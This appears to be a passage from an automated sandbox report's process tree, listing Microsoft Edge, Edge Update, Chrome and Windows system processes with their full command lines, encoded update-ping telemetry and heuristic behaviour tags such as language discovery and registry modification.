"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OENERUY2NDktMTNGRC00QTFELUE5OUUtOEQ0NDIwRjMyNjRFfSIgdXNlcmlkPSJ7MzM4N0NFOUEtMDE0Ny00Q0Y1LUEwNTItNDIzQ0RCNkRGMEFDfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7REEwNDdCRTItM0NBOC00QzI4LTk4RTYtMkNGNkE3RTE4OTY2fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4yMjAwMC40OTMiIHNwPSIiIGFyY2g9Ing2NCIgcHJvZHVjdF90eXBlPSI0OCIgaXNfd2lwPSIwIiBpc19pbl9sb2NrZG93bl9tb2RlPSIwIi8-PG9lbSBwcm9kdWN0X21hbnVmYWN0dXJlcj0iIiBwcm9kdWN0X25hbWU9IiIvPjxleHAgZXRhZz0iJnF1b3Q7RSt4YkF6Nlk2c1UxMjg5YlM2cWw0VlJMYmtqZkJVR1RNSnNqckhyNDRpST0mcXVvdDsiLz48YXBwIGFwcGlkPSJ7OEE2OUQzNDUtRDU2NC00NjNjLUFGRjEtQTY5RDlFNTMwRjk2fSIgdmVyc2lvbj0iMTIzLjAuNjMxMi4xMjMiIG5leHR2ZXJzaW9uPSIiIGxhbmc9ImVuIiBicmFuZD0iR0dMUyIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjIiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjY0MSIgb29iZV9pbnN0YWxsX3RpbWU9IjEzMzgzNDI5MjY4NjIxMDAwMCI-PGV2ZW50IGV2ZW50dHlwZT0iMzEiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjIxNzk4NjIiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU2NTAyMzE0MTIiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:2812

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=39 --always-read-main-dll --field-trial-handle=7316,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6800 /prefetch:1
1⤵
PID:1672

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --string-annotations --always-read-main-dll --field-trial-handle=6904,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6900 /prefetch:14
1⤵
PID:2360

C:\Windows\SysWOW64\wermgr.exe
"C:\Windows\system32\wermgr.exe" "-outproc" "0" "4796" "1152" "1156" "1264" "0" "0" "0" "0" "0" "0" "0" "0"
1⤵
- System Location Discovery: System Language Discovery
- Checks processor information in registry
- Enumerates system info in registry
PID:5012

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OENERUY2NDktMTNGRC00QTFELUE5OUUtOEQ0NDIwRjMyNjRFfSIgdXNlcmlkPSJ7MzM4N0NFOUEtMDE0Ny00Q0Y1LUEwNTItNDIzQ0RCNkRGMEFDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins4QjNDRUY4Qi0wNTBCLTQ3NzUtODQ1Qi0xOEQ2MkZFRTFFOTJ9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9Ins1NkVCMThGOC1CMDA4LTRDQkQtQjZEMi04Qzk3RkU3RTkwNjJ9IiB2ZXJzaW9uPSIxMzIuMC4yOTU3LjE0MCIgbmV4dHZlcnNpb249IiIgbGFuZz0iIiBicmFuZD0iSU5CWCIgY2xpZW50PSIiIGluc3RhbGxhZ2U9IjIiIGluc3RhbGxkYXRldGltZT0iMTczODk1NjE2MiI-PGV2ZW50IGV2ZW50dHlwZT0iMzIiIGV2ZW50cmVzdWx0PSIxIiBlcnJvcmNvZGU9IjAiIGV4dHJhY29kZTE9IjQiIHN5c3RlbV91cHRpbWVfdGlja3M9IjU3NDMzMjY4MTEiLz48L2FwcD48L3JlcXVlc3Q-
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --string-annotations --always-read-main-dll --field-trial-handle=6824,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6796 /prefetch:14
1⤵
PID:1696

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --always-read-main-dll --field-trial-handle=6228,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:1
1⤵
PID:3232

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=43 --always-read-main-dll --field-trial-handle=7452,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6320 /prefetch:1
1⤵
PID:3080

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --string-annotations --always-read-main-dll --field-trial-handle=7588,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7584 /prefetch:14
1⤵
PID:4028

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --always-read-main-dll --field-trial-handle=7596,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7628 /prefetch:1
1⤵
PID:1464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --always-read-main-dll --field-trial-handle=7940,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7964 /prefetch:1
1⤵
PID:748

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=7472,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7932 /prefetch:14
1⤵
PID:2028

C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe
"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7OENERUY2NDktMTNGRC00QTFELUE5OUUtOEQ0NDIwRjMyNjRFfSIgdXNlcmlkPSJ7MzM4N0NFOUEtMDE0Ny00Q0Y1LUEwNTItNDIzQ0RCNkRGMEFDfSIgaW5zdGFsbHNvdXJjZT0ic2NoZWR1bGVyIiByZXF1ZXN0aWQ9Ins1RUIyREI2NC02RDE1LTQ0MEMtQjIzRi05MUM5NDkxMjE1NjN9IiBkZWR1cD0iY3IiIGRvbWFpbmpvaW5lZD0iMCI-PGh3IGxvZ2ljYWxfY3B1cz0iMiIgcGh5c21lbW9yeT0iNCIgZGlza190eXBlPSIyIiBzc2U9IjEiIHNzZTI9IjEiIHNzZTM9IjEiIHNzc2UzPSIxIiBzc2U0MT0iMSIgc3NlNDI9IjEiIGF2eD0iMSIvPjxvcyBwbGF0Zm9ybT0id2luIiB2ZXJzaW9uPSIxMC4wLjIyMDAwLjQ5MyIgc3A9IiIgYXJjaD0ieDY0IiBwcm9kdWN0X3R5cGU9IjQ4IiBpc193aXA9IjAiIGlzX2luX2xvY2tkb3duX21vZGU9IjAiLz48b2VtIHByb2R1Y3RfbWFudWZhY3R1cmVyPSIiIHByb2R1Y3RfbmFtZT0iIi8-PGV4cCBldGFnPSImcXVvdDtWUFFvUDFGK2ZxMTV3UnpoMWtQTDRQTXBXaDhPUk1CNWl6dnJPQy9jaGpRPSZxdW90OyIvPjxhcHAgYXBwaWQ9IntGM0M0RkUwMC1FRkQ1LTQwM0ItOTU2OS0zOThBMjBGMUJBNEF9IiB2ZXJzaW9uPSIxLjMuMTk1LjQzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgaW5zdGFsbGFnZT0iMiIgY29ob3J0PSJycmZAMC4wOCI-PHVwZGF0ZWNoZWNrLz48cGluZyByPSIyIiByZD0iNjYxMiIgcGluZ19mcmVzaG5lc3M9Ins2RkJBQTk1RC1FM0UzLTQwRkEtQUVCNS0wRUIwMjZENjY4QTB9Ii8-PC9hcHA-PGFwcCBhcHBpZD0iezU2RUIxOEY4LUIwMDgtNENCRC1CNkQyLThDOTdGRTdFOTA2Mn0iIHZlcnNpb249IjEzMi4wLjI5NTcuMTQwIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSIiIGJyYW5kPSJJTkJYIiBjbGllbnQ9IiIgZXhwZXJpbWVudHM9ImNvbnNlbnQ9ZmFsc2UiIGluc3RhbGxhZ2U9IjIiIGNvaG9ydD0icnJmQDAuODYiIG9vYmVfaW5zdGFsbF90aW1lPSIxODQ0Njc0NDA3MzcwOTU1MTYwNiIgdXBkYXRlX2NvdW50PSIxIiBsYXN0X2xhdW5jaF9jb3VudD0iMSIgbGFzdF9sYXVuY2hfdGltZT0iMTMzODM2MDUxOTU0MjQ4MjAwIj48dXBkYXRlY2hlY2svPjxwaW5nIGFjdGl2ZT0iMSIgYT0iMiIgcj0iMiIgYWQ9IjY2MTIiIHJkPSI2NjEyIiBwaW5nX2ZyZXNobmVzcz0ie0M4QkYxQzI4LUYxRTYtNEU0Ri1CMzE4LTIyRUMyMTQ4MjU0N30iLz48L2FwcD48YXBwIGFwcGlkPSJ7RjMwMTcyMjYtRkUyQS00Mjk1LThCREYtMDBDM0E5QTdFNEM1fSIgdmVyc2lvbj0iMTMyLjAuMjk1Ny4xNDAiIG5leHR2ZXJzaW9uPSIiIGxhbmc9IiIgYnJhbmQ9IklOQlgiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIyIiBjb2hvcnQ9InJyZkAwLjI1IiB1cGRhdGVfY291bnQ9IjEiPjx1cGRhdGVjaGVjay8-PHBpbmcgcj0iMiIgcmQ9IjY2MTIiIHBpbmdfZnJlc2huZXNzPSJ7MkIyOUY3QkItN0QwRS00MzVDLUEyQjAtQTU2NzNEQkQwRjhFfSIvPjwvYXBwPjwvcmVxdWVzdD4
1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:1712

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=49 --always-read-main-dll --field-trial-handle=7244,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7544 /prefetch:1
1⤵
PID:4564

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Drops file in Windows directory
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1528
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd0c1acc40,0x7ffd0c1acc4c,0x7ffd0c1acc58
  2⤵
  PID:1388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1904,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1900 /prefetch:2
  2⤵
  PID:2552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2104,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2116 /prefetch:3
  2⤵
  PID:2072
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2208,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=2372 /prefetch:8
  2⤵
  PID:2160
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3088,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3236 /prefetch:1
  2⤵
  PID:1376
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3156,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3380 /prefetch:1
  2⤵
  PID:4256
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4388,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4400 /prefetch:1
  2⤵
  PID:5216
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4580,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4592 /prefetch:8
  2⤵
  PID:5340
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4564,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3064 /prefetch:8
  2⤵
  PID:5424
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4628,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4692 /prefetch:8
  2⤵
  PID:5520
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4840,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4852 /prefetch:8
  2⤵
  PID:5536
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --field-trial-handle=4892,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4944 /prefetch:1
  2⤵
  PID:5728
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4368,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3228 /prefetch:8
  2⤵
  PID:5832
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3380,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5128 /prefetch:8
  2⤵
  - Modifies registry class
  PID:5840
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=3472,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=3400 /prefetch:1
  2⤵
  PID:5600
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5332,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5364 /prefetch:1
  2⤵
  PID:5128
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=4512,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5524 /prefetch:1
  2⤵
  PID:5152
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5644,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=872 /prefetch:8
  2⤵
  PID:5372
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4536,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5548 /prefetch:8
  2⤵
  PID:5408
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=5508,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=1116 /prefetch:1
  2⤵
  PID:5480
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=5472,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5480 /prefetch:1
  2⤵
  PID:2444
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=5864,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  - NTFS ADS
  PID:1860
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.22000.1 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=3456,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=6096 /prefetch:8
  2⤵
  - Suspicious behavior: EnumeratesProcesses
  PID:5380
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=24 --field-trial-handle=4968,i,127156974854000998,7352437170408816741,262144 --variations-seed-version=20250207-050113.109000 --mojo-platform-channel-handle=4632 /prefetch:1
  2⤵
  PID:5520

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:4876

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:5620

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=7892,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7308 /prefetch:14
1⤵
PID:5236

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=7504,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7536 /prefetch:14
1⤵
PID:5932

C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\132.0.2957.140\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=7504,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7536 /prefetch:14
1⤵
PID:5824

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --disable-gpu-compositing --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=52 --always-read-main-dll --field-trial-handle=5776,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=5832 /prefetch:1
1⤵
PID:984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --string-annotations --always-read-main-dll --field-trial-handle=7216,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=6004 /prefetch:14
1⤵
PID:3592

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=7492,i,5196468204561736377,6969146092473404825,262144 --variations-seed-version --mojo-platform-channel-handle=7148 /prefetch:14
1⤵
PID:5788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
